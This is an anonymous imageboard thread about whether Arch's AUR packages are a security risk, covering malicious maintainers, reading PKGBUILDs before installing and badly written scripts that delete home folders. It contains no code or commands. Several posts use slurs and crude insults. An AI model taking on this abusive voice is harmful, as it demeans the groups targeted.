AUR, blessing, or curse?

Is the AUR secure, or a security risk? What is stopping a maintainer from inserting malicious code into a program and sending an update.

the same reason that using a helper such as yaourt is not recommended: you should read the PKGBUILD before you install/update

>you should read the PKGBUILD before you install/update
Ain't nobody got time for that sweetie

A good helper will allow you to view them before installing.

layman is superior, install gentoo

More like you need to get laid, man

...

Nope

I would be very surprised if anything malicious made it's way into a pkgbuild. Have you ever witnessed how autistic the majority of Arch users are? I'd never submit a package to the AUR, simply because of the spazoid comments that it would without a doubt, receive. Regardless, you can simply give the pkgbuild a once over before installing. It's kind of hard to fake things like the URL's of the sources, so any funny business will tend to stick out.

i bet you floss your teeth too fag

I'm talking about the source being compromised. In other words, you'd have to audit the source of a new update in AUR to be truly secure.

>doesn't floss
jesus fuck pajeet

No point in doing so if you brush thoroughly enough

What is stopping an arch developer from inserting malicious code into a program and sending an update?

Them being bound by a code of honor, something AUR maintainers don't have to adhere to.

Oh, I see. Well, I guess it's no different than adding PPA's or installing software from outside your repo's on any other distro. Hell, if you're going to worry that much, you may want to reconsider installing any OS, given the fact that Mint was issuing compromised ISO's. I monitor my system like a loon, so in a way, I almost don't even worry anymore about what I install.

what if they did all that work to gain our trust and they suddenly enable a kernel level botnet

The AUR is fucking amazing. On Ubuntu it's like with Windows: you have to search online for the thing you want to install. Then you have to install some shitty PPA. With the AUR everything you could ever want is there, and it all just works. All you have to do is read through the script to make sure it's safe. You can also see comments from other users, and can subscribe to get notified about anything important.

They would have to commit Sudoku for breaking their scared vow. Not worth it to them.

Honestly the AUR is the biggest reason I use Arch. I wish other distros had something like this. Seriously, why the fuck don't they when it's clearly so popular? I'd use NixOS especially if it had an AUR-like thing.

who gives a fucking shit

AUR is nice. Someone could theoretically put botnet in there, but any moron can just read the PKGBUILD.

>not worth it to them
hope so

>check PKGBUILD
>all it does is download the tarball, extract, make, create directories and install
It’s pretty easy to check. Even if there is a PKGBUILD that deletes root, AUR helpers dont let you build a package with root privileges

is there any record of any package in any distro doing something bad?(when it shouldn't be)

The AUR is very dangerous, you should probably never used, unless you really don't have any other choice.

Even then, you should read the PKGBUILD very carefully,a typo on it could damage your system, or do really stupid shit like erase your home folder for example (this has happen more than once).

If you need to get software for Arch I go like this:

1. Check if it's on the repos
2. Check if the developer provides a flatpak.
3. Check if I can compile it from source.
4. Check the AUR.

Also, fuck the Arch way.

Source being malicious is really really rare, the problems usually come from poorly made PKGBUILD scripts deleting your home folder and things like that,

Why are Americans so obsessed with dental floss?

>3. Check if I can compile it from source.
>4. Check the AUR.

It's the same thing, bro

>t.pacaur